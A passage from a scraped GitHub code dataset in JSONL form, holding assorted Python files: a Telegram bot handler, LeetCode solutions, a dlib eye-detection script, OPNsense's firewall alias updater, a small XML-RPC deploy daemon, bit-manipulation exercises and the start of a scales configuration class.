f\"Hello, {name}\"}\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n name = args.name\n uvicorn.run(app, port=8000)\n","repo_name":"ranjeetrj/tech-stuff-Devops","sub_path":"shell-scripts/fastapi/my-api-file.py","file_name":"my-api-file.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41979760020","text":"import asyncio\nfrom time import time\nfrom datetime import datetime\nfrom modules.helpers.filters import command\nfrom modules.helpers.command import commandpro\nfrom pyrogram import Client, filters\nfrom pyrogram.types import Message, InlineKeyboardMarkup, InlineKeyboardButton\n\n\nSTART_TIME = datetime.utcnow()\nSTART_TIME_ISO = START_TIME.replace(microsecond=0).isoformat()\nTIME_DURATION_UNITS = (\n ('week', 60 * 60 * 24 * 7),\n ('day', 60 * 60 * 24),\n ('hour', 60 * 60),\n ('min', 60),\n ('sec', 1)\n)\n\nasync def _human_time_duration(seconds):\n if seconds == 0:\n return 'inf'\n parts = []\n for unit, div in TIME_DURATION_UNITS:\n amount, seconds = divmod(int(seconds), div)\n if amount > 0:\n parts.append('{} {}{}'\n .format(amount, unit, \"\" if amount == 1 else \"s\"))\n return ', '.join(parts)\n \n \n\n@Client.on_message(command(\"start\") & filters.private & ~filters.edited)\nasync def start_(client: Client, message: Message):\n await message.reply_photo(\n photo=f\"https://te.legra.ph/file/53461fb7bd54fad831355.jpg\",\n caption=f\"\"\"**━━━━━━━━━━━━━━━━━━━━━━━━\nAdd me to your group and enjoy the high quality songs over telegram video chat feature. \n┏━━━━━━━━━━━━━━━━━┓\n┣★ Developer : [Aditya](https://t.me/swssy)\n┗━━━━━━━━━━━━━━━━━┛\nReach out to the admins for any issue.\n━━━━━━━━━━━━━━━━━━━━━━━━**\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n \"❰ ᴊᴏɪɴ ʜᴇʀᴇ ғᴏʀ ᴜᴘᴅᴀᴛᴇs ❱\", url=f\"https://t.me/swssy\")\n ]\n \n ]\n ),\n )\n \n \n@Client.on_message(commandpro([\"/start\", \"/alive\", \"aditya\", \"near\"]) & filters.group & ~filters.edited)\nasync def start(client: Client, message: Message):\n await message.reply_photo(\n photo=f\"https://te.legra.ph/file/b0cbf256b34584cce041a.jpg\",\n caption=f\"\"\"\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n \"ᴊᴏɪɴ ʜᴇʀᴇ ᴀɴᴅ sᴜᴘᴘᴏʀᴛ\", url=f\"https://t.me/swssy\")\n ]\n ]\n ),\n )\n\n","repo_name":"spark3600/AdityaNewPlayer","sub_path":"plugins/alive.py","file_name":"alive.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32028236831","text":"# https://leetcode.com/problems/valid-parenthesis-string/\n\n\"\"\" \nGiven a string s containing only three types of characters: '(', ')' and '*', return true if s is valid.\n\nThe following rules define a valid string:\n\nAny left parenthesis '(' must have a corresponding right parenthesis ')'.\nAny right parenthesis ')' must have a corresponding left parenthesis '('.\nLeft parenthesis '(' must go before the corresponding right parenthesis ')'.\n'*' could be treated as a single right parenthesis ')' or a single left parenthesis '(' or an empty string \"\".\n \n\nExample 1:\nInput: s = \"()\"\nOutput: true\n\nExample 2:\nInput: s = \"(*)\"\nOutput: true\n\nExample 3:\nInput: s = \"(*))\"\nOutput: true \n\n\"\"\"\n\n# Solution\n\"\"\" \nIntuition:\nOne pass on the string S,\nwe need to know,\nhow many ')' we are waiting for.\n\nIf we meet too many ')', we can return false directly.\nIf we wait for no ')' at the end, then we are good.\n\n\nExplanation:\nWe count the number of ')' we are waiting for,\nand it's equal to the number of open parenthesis.\nThis number will be in a range and we count it as [cmin, cmax]\n\ncmax counts the maximum open parenthesis,\nwhich means the maximum number of unbalanced '(' that COULD be paired.\ncmin counts the minimum open parenthesis,\nwhich means the number of unbalanced '(' that MUST be paired.\n\n\nExample:\nIt's quite straight forward actually.\nWhen you met \"(\", you know you need one only one \")\", cmin = 1 and cmax = 1.\nWhen you met \"(*(\", you know you need one/two/three \")\", cmin = 1 and cmax = 3.\n\nThe string is valid for 2 condition:\n\ncmax will never be negative.\ncmin is 0 at the end.\n\"\"\"\n\n\nclass Solution:\n def checkValidString(self, s: str) -> bool:\n count_left = 0\n count_right = 0\n count_any = 0\n\n cmin = cmax = 0\n\n for i in s:\n if i == '(':\n cmax += 1\n cmin += 1\n elif i == ')':\n cmax -= 1\n cmin -= 1\n elif i == '*':\n cmax += 1\n cmin -= 1\n # cmax++; if `*` become `(` then openCount++\n # cmin--; if `*` become `)` then openCount--\n # if `*` become `` then nothing happens\n # So openCount will be in new range [cmin-1, cmax+1]\n\n if cmax < 0:\n return False\n\n cmin = max(cmin, 0)\n\n return cmin == 0\n","repo_name":"atharvaagrawal/dsa","sub_path":"Striver-A2Z/12_Greedy_Algorithms/1_Easy/5_valid-parenthesis-string.py","file_name":"5_valid-parenthesis-string.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12161752742","text":"\"\"\"\nProgram to detect face and facial keypoints of given images using the dlib library\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport dlib\n\nleft = [36, 37, 38, 39, 40, 41] # keypoint indices for left eye\nright = [42, 43, 44, 45, 46, 47] # keypoint indices for right eye\nimg_path = \"test_images\\\\face1.png\"\nmodel_path = \"models\\\\shape_68.dat\"\n\ndef rect_to_bb(rect):\n \"\"\"\n Take a dlib bouding box and convert it to (x, y, w, h) format used in opencv\n \"\"\"\n x = rect.left()\n y = rect.top()\n w = rect.right() - x\n h = rect.bottom() - y\n return (x, y, w, h)\n\ndef shape_to_np(shape, dtype=\"int\"):\n \"\"\" \n Converts 68 facial keypoints shape to numpy array\n \"\"\"\n coords = np.zeros((68, 2), dtype=dtype)\n for i in range(0, 68):\n coords[i] = (shape.part(i).x, shape.part(i).y)\n return coords\n\ndef eye_on_mask(shape, mask, side):\n \"\"\"\n Convex filling to create mask for eye keypoints\n \"\"\"\n points = [shape[i] for i in side]\n points = np.array(points, dtype=np.int32)\n mask = cv2.fillConvexPoly(mask, points, 255)\n return mask\n\ndef detect_face(img):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # convert to grayscale \n detector = dlib.get_frontal_face_detector()\n rects = detector(gray, 1) # rects contains all the faces detected\n\n bboxes = []\n for rect in rects:\n bbox = rect_to_bb(rect)\n bboxes.append(bbox)\n x, y, w, h = bbox\n start_pt = (x, y)\n end_pt = (x+w, y+h)\n cv2.rectangle(img, start_pt, end_pt, (255, 0, 0), 2)\n cv2.imshow(\"Bouding Boxes\", img)\n \n predictor = dlib.shape_predictor(model_path)\n for (i, rect) in enumerate(rects):\n # predicting facial keypoints\n shape = predictor(gray, rect)\n shape = shape_to_np(shape)\n\n # # plotting keypoints\n # for (x, y) in shape:\n # cv2.circle(img, (x, y), 2, (0, 255, 0), -1)\n\n # creating mask for eyes\n mask = np.zeros(img.shape[:2], dtype=np.uint8)\n # cv2.imshow(\"Blank mask\", mask)\n mask = eye_on_mask(shape, mask, left)\n # cv2.imshow(\"Left eye mask\", mask)\n mask = eye_on_mask(shape, mask, right)\n # cv2.imshow(\"Left + Right eye mask\", mask)\n\n # processing the mask\n kernel = np.ones((9, 9), np.uint8)\n mask = cv2.dilate(mask, kernel, 5)\n eyes = cv2.bitwise_and(img, img, mask=mask)\n cv2.imshow(\"Segmented eyes\", eyes)\n mask = (eyes == [0, 0, 0]).all(axis=2)\n eyes[mask] = [255, 255, 255]\n eyes_gray = cv2.cvtColor(eyes, cv2.COLOR_BGR2GRAY)\n cv2.imshow(\"eye mask\", eyes_gray)\n\n # thresholding to segement eyeballs\n def nothing(x):\n pass\n cv2.namedWindow('image')\n cv2.createTrackbar('threshold', 'image', 0, 255, nothing)\n threshold = cv2.getTrackbarPos('threshold', 'image')\n _, thresh = cv2.threshold(eyes_gray, threshold, 255, cv2.THRESH_BINARY)\n thresh = cv2.erode(thresh, None, iterations=2)\n thresh = cv2.dilate(thresh, None, iterations=4)\n thresh = cv2.medianBlur(thresh, 3)\n\n cv2.imshow(\"img\", img)\n\n# cap = cv2.VideoCapture(0)\n# while(True):\n# ret, img = cap.read()\n# detect_face(img)\n# if cv2.waitKey(1) & 0xFF == ord('q'): # escape when q is pressed\n# break\n\nimg = cv2.imread(img_path)\ndetect_face(img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"ParthGupta11/eye-tracker","sub_path":"scripts/test_scripts/script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24353400432","text":"import urllib.request\nimport urllib.parse\nimport sys\nimport io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\nAPI = \"https://api.ipify.org\"\n\nvalues = {\n 'format': 'json'\n}\nparams = urllib.parse.urlencode(values)\n\n#요청 URL 생성\nurl = API + \"?\" + params\n\n#읽기\ndata = urllib.request.urlopen(url).read()\ntext = data.decode(\"utf-8\")\n\nprint(text)","repo_name":"coldcaphe/pythonParsing","sub_path":"download2-3-1.py","file_name":"download2-3-1.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10623392860","text":"import os\nimport sys\nimport argparse\nimport json\nimport xml.etree.cElementTree as ET\nimport syslog\nimport glob\nfrom lib.alias import AliasParser\nfrom lib.alias.pf import PF\nfrom lib.alias.geoip import GEOIP\n\n\nif __name__ == '__main__':\n result = {'status': 'ok'}\n parser = argparse.ArgumentParser()\n parser.add_argument('--output', help='output type [json/text]', default='json')\n parser.add_argument('--source_conf', help='configuration xml', default='/usr/local/etc/filter_tables.conf')\n parser.add_argument('--aliases', help='aliases to update (targetted), comma separated', type=lambda x: x.split(','))\n parser.add_argument('--types', help='alias types to update (comma seperated)', type=lambda x: x.split(','))\n inputargs = parser.parse_args()\n syslog.openlog('firewall', facility=syslog.LOG_LOCAL4)\n\n # make sure our target directory exists\n if not os.path.isdir('/var/db/aliastables'):\n os.makedirs('/var/db/aliastables')\n\n # make sure we download geoip data if not found. Since aliases only will trigger a download when change requires it\n if not os.path.isfile('/usr/local/share/GeoIP/alias.stats'):\n GEOIP().download()\n\n try:\n source_tree = ET.ElementTree(file=inputargs.source_conf)\n except ET.ParseError as e:\n syslog.syslog(syslog.LOG_ERR, 'filter table parse error (%s) %s' % (str(e), inputargs.source_conf))\n sys.exit(-1)\n\n aliases = AliasParser(source_tree)\n aliases.read()\n\n # collect \"to_update\" list, when not set (None) we're planning to update all following normal lifetime rules.\n to_update = None\n if inputargs.aliases is not None or inputargs.types is not None:\n to_update = inputargs.aliases if inputargs.aliases is not None else []\n if inputargs.types is not None:\n for alias in aliases:\n if alias.get_type() in inputargs.types:\n to_update.append(alias.get_name())\n\n use_cached = lambda x: to_update is not None and x not in to_update\n for alias in aliases:\n # fetch alias content including dependencies\n # when a distinct set of aliases is offered, use current contents for all other alias types\n alias_name = alias.get_name()\n alias_content = alias.cached() if use_cached(alias_name) else alias.resolve()\n alias_changed_or_expired = max(alias.changed(), alias.expired())\n for related_alias_name in aliases.get_alias_deps(alias_name):\n if related_alias_name != alias_name:\n rel_alias = aliases.get(related_alias_name)\n if rel_alias:\n alias_content += rel_alias.cached() if use_cached(related_alias_name) else rel_alias.resolve()\n alias_changed_or_expired = max(alias_changed_or_expired, rel_alias.changed(), rel_alias.expired())\n\n # only try to replace the contents of this alias if we're responsible for it (know how to parse)\n if alias.get_parser():\n # when the alias or any of it's dependencies has changed, generate new\n if alias_changed_or_expired or not os.path.isfile('/var/db/aliastables/%s.txt' % alias_name):\n open('/var/db/aliastables/%s.txt' % alias_name, 'w').write('\\n'.join(sorted(alias_content)))\n\n # list current alias content when not trying to update a targetted list\n alias_pf_content = list(PF.list_table(alias_name)) if to_update is None else alias_content\n\n if (len(alias_content) != len(alias_pf_content) or alias_changed_or_expired):\n # if the alias is changed, expired or the one in memory has a different number of items, load table\n if len(alias_content) == 0:\n if len(alias_pf_content) > 0:\n # flush when target is empty\n PF.flush(alias_name)\n else:\n # replace table contents with collected alias\n error_output = PF.replace(alias_name, '/var/db/aliastables/%s.txt' % alias_name)\n if error_output.find('pfctl: ') > -1:\n error_message = \"Error loading alias [%s]: %s {current_size: %d, new_size: %d}\" % (\n alias_name,\n error_output.replace('pfctl: ', ''),\n len(alias_pf_content),\n len(alias_content),\n )\n result['status'] = 'error'\n if 'messages' not in result:\n result['messages'] = list()\n if error_output not in result['messages']:\n result['messages'].append(error_message)\n syslog.syslog(syslog.LOG_NOTICE, error_message)\n\n # cleanup removed aliases when reloading all\n if to_update is None:\n registered_aliases = [alias.get_name() for alias in aliases if alias.is_managed()]\n to_remove = list()\n to_remove_files = dict()\n for filename in glob.glob('/var/db/aliastables/*.txt'):\n aliasname = os.path.basename(filename).split('.')[0]\n if aliasname not in registered_aliases:\n if aliasname not in to_remove_files:\n to_remove_files[aliasname] = list()\n # in order to remove files the alias should either be managed externally or not exist at all\n if aliasname not in to_remove and (filename.find('.md5.') > 0 or aliases.get(aliasname) is None):\n # only remove files if there's a checksum\n to_remove.append(aliasname)\n to_remove_files[aliasname].append(filename)\n for aliasname in to_remove:\n syslog.syslog(syslog.LOG_NOTICE, 'remove old alias %s' % aliasname)\n PF.remove(aliasname)\n for filename in to_remove_files[aliasname]:\n os.remove(filename)\n\n print (json.dumps(result))\n","repo_name":"opnsense/core","sub_path":"src/opnsense/scripts/filter/update_tables.py","file_name":"update_tables.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":2702,"dataset":"github-code","pt":"72"} +{"seq_id":"13867358189","text":"#!/usr/bin/env python\n\nfrom SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler\nimport os\nimport sys\nimport time\nimport daemon\nfrom multiprocessing import Process\nimport logging\n\nimport logging\nlog = logging.getLogger ( \"auto1\" )\nlog.addHandler ( logging.FileHandler ( \"/var/log/auto1.log\" ) )\nlog.setLevel ( logging.INFO )\n\n\nclass StreamToLogger(object):\n \"\"\"\n Fake file-like stream object that redirects writes to a logger instance.\n \"\"\"\n def __init__(self, logger, log_level=logging.INFO):\n self.logger = logger\n self.log_level = log_level\n self.linebuf = ''\n def write(self, buf):\n for line in buf.rstrip().splitlines():\n self.logger.log(self.log_level, line.rstrip())\n\t\t \n def isatty ( self ) :\n return False\t\n\t\n def flush ( self ): \n for handler in self.logger.handlers:\n handler.flush ()\n\n\"\"\"\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s:%(levelname)s:%(name)s:%(message)s',\n filename=\"out.log\",\n filemode='a'\n)\n\"\"\"\n \nstdout_logger = logging.getLogger('STDOUT')\nstdout_logger.addHandler ( logging.FileHandler ( \"/var/log/auto1.log\" ) )\nsl = StreamToLogger(stdout_logger, logging.INFO)\nsys.stdout = sl\n \nstderr_logger = logging.getLogger('STDERR')\nstderr_logger.addHandler ( logging.FileHandler ( \"/var/log/auto1.log\" ) )\nsl = StreamToLogger(stderr_logger, logging.ERROR)\nsys.stderr = sl\n\ndef fork ( ):\n if os.fork ( ):\n os._exit ( 0 );\n\n os.chdir ( \"/\" )\n os.setsid ( )\n os.umask ( 0 )\n\n if os.fork ( ):\n os._exit ( 0 )\n #os.dup2 ( file ( os.devnull, \"r\" ).fileno ( ), sys.stdin.fileno ( ) )\n #os.dup2 ( file ( os.devnull, \"a+\" ).fileno ( ), sys.stdout.fileno ( ) )\n #os.dup2 ( file ( os.devnull, \"a+\", 0 ).fileno ( ), sys.stderr.fileno ( ) )\n\ndef deploy ( ):\n os.setuid ( 1000 )\n out = \"\"\n stdin, stdout, stderr = os.popen3 ( \"cd /var/bukaopu/; pwd; git pull origin master\" )\n out += stderr.read ( ) + stdout.read ( )\n stdin, stdout, stderr = os.popen3 ( \"supervisorctl -s http://127.0.0.1:9001 restart gunicorn\" )\n out += stderr.read ( ) + stdout.read ( )\n\n\ndef restart ( ):\n p = Process ( target = deploy )\n p.start ( )\n stdout_logger.info ( \"restart\" )\n return \"Ok\"\n \n\ndef echo ( s ):\n return s\n\n\ndef main ( ):\n server = SimpleXMLRPCServer ( ( '', 9002 ), SimpleXMLRPCRequestHandler, False )\n server.register_function ( restart, \"restart\" )\n server.register_function ( echo, \"echo\" )\n server.serve_forever()\n \nif \"__main__\" == __name__:\n fork ()\n main ( )\n","repo_name":"imcj/web_auto1","sub_path":"scripts/deploy1d.py","file_name":"deploy1d.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8551336966","text":"# https://leetcode.com/problems/replace-elements-with-greatest-element-on-right-side/\nfrom typing import List\n\n\nclass Solution:\n def replaceElements(self, arr: List[int]) -> List[int]:\n if len(arr) == 1:\n return [-1]\n\n rightMax = -1\n\n for i in range(len(arr) - 1, -1, -1):\n temp = max(rightMax, arr[i])\n arr[i] = rightMax\n rightMax = temp\n\n return arr","repo_name":"jeffreytigerwang/Python-Practice","sub_path":"easy/Replace Elements with Greatest Element on Right Side.py","file_name":"Replace Elements with Greatest Element on Right Side.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8810241394","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n # 3. dict이용 - O(1) ~ O(N)\n # dict에 저장\n nums_map = dict()\n for i, num in enumerate(nums):\n if (target - num) in nums_map:\n return [nums_map[target - num], i]\n nums_map[num] = i\n \n # 4. 투포인터 - O(NlogN) - O(NlogN) + O(N)임\n# nums = [(val, idx) for idx, val in enumerate(nums)]\n# nums = sorted(nums, key=lambda x:x[0])\n# result = []\n# left = 0\n# right = len(nums) - 1\n# while left < right:\n# temp = nums[left][0] + nums[right][0]\n# if temp > target:\n# right -= 1\n# elif temp < target:\n# left += 1\n# else:\n# return [nums[left][1], nums[right][1]]\n \n # # 2. in을 이용한 탐색 - O(N^2) brute force보다 빠름\n# for idx, val in enumerate(nums):\n# x = target - val\n# if x in nums[idx + 1:]:\n# return [nums.index(val), nums[idx+1:].index(x)+(idx+1) ]\n \n # 1. 브루트포스 - O(N^2)\n # for i in range(len(nums)):\n # for j in range(i+1, len(nums)):\n # if nums[i] + nums[j] == target:\n # return [i, j]","repo_name":"Minsik113/Algorithm-practice","sub_path":"[책]파이썬알고리즘인터뷰/leetcode/2_배열/001_Two Sum.py","file_name":"001_Two Sum.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8584943138","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLesson 10 : 画正n边形\n\"\"\"\n\nimport turtle\n\nscr = turtle.Screen()\nt = turtle.Pen() # 初始化乌龟程序,调出图形框,准备好画笔\nt.shape(\"turtle\") # 改变画笔形状为一只乌龟,缺省是箭头arrow,\n# 还可以为 'circle'-圆, 'square'-正方形, 'triangle'-三角形, 'classic'. \n\nscr.bgcolor(\"white\") # (0.1,0.51,0.3) # red,green,blue 取值在0和1之间。1代表255,\n\nt.pensize(2) # 改变线宽度\nt.color(\"black\") # 改变画笔颜色,还有green,blue,black,white,pink,...,或者(r,g,b)\n\nt.penup()\nt.setpos(-100,-200)\nt.pendown()\n\n\n# print(\"画正多边形例子\")\nfor n in range(3,8):\n for i in range(n):\n t.fd(n*30)\n t.lt(360.0/n) # 逆时针旋转 2pi/n 度 \n \nscr.exitonclick()","repo_name":"liuxiang0/turtle_tutorial","sub_path":"Lesson-10 Draw n-poly.py","file_name":"Lesson-10 Draw n-poly.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6087205508","text":"myDNA = \"GATTATGCATGCATGCATGCATGCATGCATGCATGCATGCATGCACATTATTTATTTATTTATACAGATTATGCATGCATGCATGCATGCACATTATTTATTTATTTATTTATTTATTTATTTATTTATTTATTTATTTATACAGATTATGCATGCATGCATGCATGCATGCATGCATGCATGCATGCACATATAAAAAAAA\"\r\nmyIntronDNA = \"GATTATGCATGCATGCATGCATGCATGCATGCATGCATGCATGCACATTATTTATTTATTTATACAGATTATGCATGCATGCATGCATGCACATTATTTATTTATTTATTTATTTATTTATTTATTTATTTATTTATTTATACAGATTATGCATGCATGCATGCATGCATGCATGCATGCATGCATGCACATATAAAAAAAA\"\r\nexons = []\r\nintrons = []\r\ni = 0\r\n\r\n#list of exons in myDNA that start with GATT and end with ACA\r\nwhile len(myDNA) >= 3:\r\n\r\n #find exon that starts with GATT and ends with ACA\r\n exonStart = myDNA.find(\"GATT\")\r\n exonEnd = myDNA.find(\"ACA\") + 3\r\n exonSeq = myDNA[exonStart:exonEnd]\r\n\r\n #change myDNA to include all myDNA after exonEnd\r\n myDNA = myDNA[exonEnd :]\r\n\r\n #add exon sequence to exon list\r\n if len(exonSeq) >= 3 :\r\n exons.append(exonSeq)\r\n\r\n#print exon list from myDNA\r\nprint(\"Exons:\")\r\nprint(exons)\r\n\r\n#list of introns in myDNA that end with ACA but start with something else\r\nwhile len(myIntronDNA) >= 3 :\r\n\r\n # find intron that ends with ACA\r\n intronEnd = myIntronDNA.find(\"ACA\") + 3\r\n intronSeq = myIntronDNA[:intronEnd]\r\n\r\n # change myIntronDNA to include all myIntronDNA after intronEnd\r\n myIntronDNA = myIntronDNA[intronEnd:]\r\n\r\n # add intron sequence to intron list\r\n if len(intronSeq) >=3 :\r\n introns.append(intronSeq)\r\n\r\n#print intron list from myIntronDNA\r\nprint(\"Introns:\")\r\nprint(introns)\r\n\r\n#concatinate exons\r\nexonsString = \"\".join(exons)\r\n\r\n#print concatinated exon list from myDNA\r\nprint(\"Concatinated exons: \")\r\nprint(exonsString)\r\n","repo_name":"julia-terry/Python","sub_path":"SliceDice.py","file_name":"SliceDice.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17080547050","text":"import math, random\n\n# O(1) * n = O(n)\ndef count_bits(num):\n num_of_ones = 0\n while num:\n num_of_ones += num & 1\n num >>= 1\n return num_of_ones\n\n\n# O(1) * n = O(n)\ndef parity(num):\n number_parity = 0\n while num:\n number_parity ^= num & 1\n num >>= 1\n return number_parity\n\n\n# O(1) * k = O(k)\ndef parity_drop_first_set_bit(num):\n num_of_parity = 0\n while num:\n num_of_parity ^= num & 1\n num &= (num-1)\n return num\n\n\n# Assuming parity has been precomputed in Precomputed parity for 16 bit words\n# if L is the size of the word for which parity was precomputed and n is the word size\n# run time is O(n/L)\nPrecomputed = {}\ndef parity_precomputed(num):\n mask = 16\n bit_mask = 0xFFFF\n return ( Precomputed[num >> mask * 3] ^\n Precomputed[(num >> mask * 2) & bit_mask] ^\n Precomputed[(num >> mask * 1) & bit_mask] ^\n Precomputed[num & bit_mask] )\n\n\ndef divide_and_conquer_parity(num, mask=48):\n if num == 1 or num == 0:\n return num\n else:\n return (divide_and_conquer_parity((num >> mask), mask=mask//2) ^\n divide_and_conquer_parity((num & mask), mask=mask // 2))\n\n\n# O(1)\ndef swap(num, i, j):\n if i == j:\n return num\n else:\n num_i = num >> i\n num_j = num >> j\n if num_i & 1 == num_j & 1:\n return num\n else:\n bit_mask = (1 << i) | (1 << j)\n return num ^ bit_mask\n\n\nPrecomputed_reverse = {}\n# O(n/L)\ndef reverse_bits(num):\n bit_mask = 0xFFF\n mask = 16\n return (\n Precomputed_reverse[ (num & bit_mask) << mask * 3] |\n Precomputed_reverse[ (num >> (mask * 3))] |\n Precomputed_reverse[ ((num >> (mask * 2)) & bit_mask) << mask] |\n Precomputed_reverse[ ((num >> (mask)) * bit_mask) << mask * 2]\n\n )\n\n\n# O(n) where n is the length of unsigned num\ndef get_near_weighted_digits(num):\n num_unsigned = 64\n for i in range(num_unsigned -1):\n if (num >> i) & 1 != ((num >> (i+1)) & 1):\n num ^= ( (1 << i+1) | (1 << i) )\n break\n return num\n\n# O(n) for sum n times -> O(n^2)\ndef multiplying_with_binary(x, y):\n\n def add(a, b):\n while b:\n carry = a & b\n a, b = a ^ b , carry << 1\n return a\n\n result = 0\n i = 0\n while x > 0:\n if (x & 1) == 1:\n #result += (y << i)\n result = add(result, (y<>= 1\n y <<= 1\n return result\n\n\ndef divide_using_bits(x, y):\n quotient, power = 0, 32\n y_power = y << power\n while x >= y:\n if y_power <= x:\n quotient += 1 << power\n x -= y_power\n power -= 1\n y_power >>= 1\n\n return quotient, x\n\n\n# need to study again\ndef power_using_bits(x, y):\n result , power = 1.0, y\n if y < 0:\n power, x = -power, 1.0 / x\n while power:\n if power & 1:\n result *= x\n x *= x\n power >>= 1\n return result\n\n\n# O(n) where n is the number of digits\ndef reverse_digits(x):\n sum, num = 0 , abs(x)\n while num:\n sum = sum * 10 + num % 10\n num = num // 10\n\n return -sum if x < 0 else sum\n\n\n# time O(n) and space is O(1)\ndef is_pandialdrome(num):\n if num <= 0:\n return num == 0\n\n num_digits = math.floor(math.log10(num)) + 1\n big_mask = 10**(num_digits - 1)\n\n while num :\n\n if num % 10 != num // big_mask:\n return False\n\n num = num % big_mask\n num = num // 10\n big_mask = big_mask // 100\n\n return True\n\n\n# O(log(b-a+1)\ndef create_random_numbers(a, b):\n number_of_outcomes = b-a + 1\n while True:\n result , i = 0, 0\n while (1 << i) < number_of_outcomes:\n result = (result << 1) | random.randint(0, 1)\n i += 1\n if result < number_of_outcomes:\n break\n return result + a\n","repo_name":"JishnuRamesh/Algorithms-and-datastructures","sub_path":"PrimitiveTypes/count_bits.py","file_name":"count_bits.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19474423774","text":"from __future__ import annotations\n\nfrom collections.abc import Iterator, Sequence\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nfrom deprecated import deprecated\n\nfrom yaw.config import default as DEFAULT\nfrom yaw.config.abc import BaseConfig\nfrom yaw.config.utils import ConfigError\nfrom yaw.core.cosmology import Scale\nfrom yaw.core.docs import Parameter\nfrom yaw.core.math import array_equal\n\nif TYPE_CHECKING: # pragma: no cover\n from numpy.typing import NDArray\n\n__all__ = [\"ScalesConfig\"]\n\n\n@dataclass(frozen=True)\nclass ScalesConfig(BaseConfig):\n \"\"\"Configuration of scales used for correlation measurements.\n\n Correlation functions are measured on one or many intervals\n :math:`r_{\\\\rm min} \\\\leq r < r_{\\\\rm max}` angular diameter distance in\n kpc. When measuring correlations, this scale is coverted to angles at the\n current redshift.\n\n Additionally, pairs can be weighted by their separation\n :math:`r^\\\\alpha` if a power-law exponent is provided through ``rweight``.\n The weighting is applied logarithmically spaced bins of separation (based\n on the logarithmic bin centers). This is an approximation to actually\n weighting each pair individually and the resolution of this approximation\n can be controlled by setting the number of bins.\n\n Args:\n rmin (:obj:`float`, :obj:`list[float]`):\n Single or multiple lower scale limits in kpc (angular diameter\n distance).\n rmax (:obj:`float`, :obj:`list[float]`):\n Single or multiple upper scale limits in kpc (angular diameter\n distance).\n rweight (:obj:`float`, optional):\n Power-law exponent used to weight pairs by their separation.\n rbin_num (:obj:`int`, optional):\n Number of radial logarithmic bin used to approximate the weighting\n by separation.\n \"\"\"\n\n rmin: list[float] | float = field(\n metadata=Parameter(\n type=float,\n nargs=\"*\",\n required=True,\n help=\"(list of) lower scale limit in kpc (pyhsical)\",\n )\n )\n \"\"\"Lower scale limit(s) in kpc (angular diameter distance).\"\"\"\n rmax: list[float] | float = field(\n metadata=Parameter(\n type=float,\n nargs=\"*\",\n required=True,\n help=\"(list of) upper scale limit in kpc (pyhsical)\",\n )\n )\n \"\"\"Upper scale limit(s) in kpc (angular diameter distance).\"\"\"\n rweight: float | None = field(\n default=DEFAULT.Scales.rweight,\n metadata=Parameter(\n type=float,\n help=\"weight galaxy pairs by their separation to power 'rweight'\",\n default_text=\"(default: no weighting applied)\",\n ),\n )\n \"\"\"Power-law exponent used to weight pairs by their separation.\"\"\"\n rbin_num: int = field(\n default=DEFAULT.Scales.rbin_num,\n metadata=Parameter(\n type=int,\n help=\"number of bins in log r used (i.e. resolution) to compute distance weights\",\n default_text=\"(default: %(default)s)\",\n ),\n )\n \"\"\"Number of radial logarithmic bin used to approximate the weighting by\n separation.\"\"\"\n\n def __post_init__(self) -> None:\n msg_scale_error = \"scales violates 'rmin' < 'rmax'\"\n # validation, set to basic python types\n scalars = (float, int, np.number)\n if isinstance(self.rmin, (Sequence, np.ndarray)) and isinstance(\n self.rmax, (Sequence, np.ndarray)\n ):\n if len(self.rmin) != len(self.rmax):\n raise ConfigError(\n \"number of elements in 'rmin' and 'rmax' do not match\"\n )\n # for clean YAML conversion\n for rmin, rmax in zip(self.rmin, self.rmax):\n if rmin >= rmax:\n raise ConfigError(msg_scale_error)\n if len(self.rmin) == 1:\n rmin = float(self.rmin[0])\n rmax = float(self.rmax[0])\n else:\n rmin = list(float(f) for f in self.rmin)\n rmax = list(float(f) for f in self.rmax)\n object.__setattr__(self, \"rmin\", rmin)\n object.__setattr__(self, \"rmax\", rmax)\n elif isinstance(self.rmin, scalars) and 